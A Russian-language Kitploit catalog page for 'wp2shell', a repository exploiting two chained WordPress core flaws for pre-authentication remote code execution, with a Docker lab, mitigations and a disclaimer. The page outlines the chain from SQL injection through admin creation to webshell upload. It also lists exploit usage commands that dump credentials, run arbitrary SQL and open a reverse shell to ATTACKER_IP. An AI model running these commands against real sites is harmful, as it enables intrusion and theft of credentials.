Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-63030-CVE-2026-60137 — Эксплойт RCE без аутентификации для WordPress (CVE-2026-63030 + CVE-2026-60137), объединяющий ошибку маршрутизации и SQL-инъекцию для получения полного доступа к оболочке. Включает Docker-лабораторию для безопасного тестирования. | Kitploit
Инструменты/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-63030-CVE-2026-60137

Эксплойт RCE без аутентификации для WordPress (CVE-2026-63030 + CVE-2026-60137), объединяющий ошибку маршрутизации и SQL-инъекцию для получения полного доступа к оболочке. Включает Docker-лабораторию для безопасного тестирования.

Репозиторий
27 дней назадЕщё не проверено

CVE-2026-63030 & CVE-2026-60137 — wp2shell

RCE без аутентификации в ядре WordPress — Route Confusion + SQL Injection, объединенные в удаленное выполнение кода

CVECVE-2026-63030 + CVE-2026-60137
Псевдонимwp2shell
Тип уязвимостиREST API Route Confusion → SQL Injection → RCE
СерьезностьКритическая — CVSS 10.0
Затронутые версииWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
Исправлено вWordPress 6.8.6, 6.9.5, 7.0.2
Требуется аутентификацияНет (без аутентификации)

Обзор

wp2shell — это название цепочки эксплойтов, объединяющей 2 уязвимости в ядре WordPress:

  • CVE-2026-63030 — Route Confusion: Batch endpoint (/wp-json/batch/v1) имеет смещение индекса между массивами $matches[] и $validation[] при ошибке пути субзапроса, что приводит к выполнению следующего субзапроса с неправильным обработчиком → обход проверки схемы REST API.
  • CVE-2026-60137 — SQL Injection: WP_Query::get_posts() не санитизирует параметр author__not_in, когда он передается как строка, а не как массив → прямая SQL-инъекция.

Две ошибки вместе образуют полную цепочку Pre-Auth RCE — от нулевых учетных данных до shell на сервере через один HTTP-запрос.

Exploit Chain

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

Полный технический анализ читайте в REPORT.md


Lab Setup

Лаборатория использует Docker Compose с 3 контейнерами:

Требования

  • Docker + Docker Compose
  • Python 3.8+ (только stdlib, дополнительные пакеты не требуются)
  • Bash (для запуска setup.sh)

Запуск

root@kitploit:~
cd wp2shell-lab
bash setup.sh

Скрипт автоматически:

  1. Загружает образы и запускает контейнеры
  2. Устанавливает WordPress 6.9.4
  3. Заполняет тестовыми данными (записи, пользователи)
  4. Включает общий лог MySQL + WP_DEBUG

По завершении отобразится "WP2Shell Lab — READY!" с информацией для входа.

Очистка

root@kitploit:~
cd wp2shell-lab
docker compose down -v

Exploit Usage

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

PoC скрипт полностью переписан, основан на Icex0/wp2shell-poc. Использует только стандартную библиотеку Python 3, дополнительные зависимости не требуются.


Условия эксплуатации

УсловиеТребование
Версия WordPress6.9.0–6.9.4 или 7.0.0–7.0.1
REST API batch endpointДоступен (включен по умолчанию)
АутентификацияНе требуется
СетьАтакующий может достичь WordPress

Mitigation

  1. Обновите WordPress до >= 6.9.5 или >= 7.0.2 — единственный радикальный способ.
  2. Временно отключите batch endpoint: добавьте add_filter('rest_batch_disabled', '__return_true'); в functions.php.
  3. Правило WAF: блокируйте запросы к /wp-json/batch/v1, содержащие SQL-ключевые слова.

Disclaimer

Этот репозиторий создан для целей исследования, обучения и CTF в контролируемой лабораторной среде. Не используйте для атаки реальных систем. Любое несанкционированное использование является нарушением закона.


Ссылки

  • Icex0/wp2shell-poc — оригинальный PoC для справки
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
Скачать инструмент
Контейнер
Образ
Порт
WordPress (уязвимый)wordpress:6.9.48080
MySQLmysql:8.0internal
phpMyAdminphpmyadmin:latest8081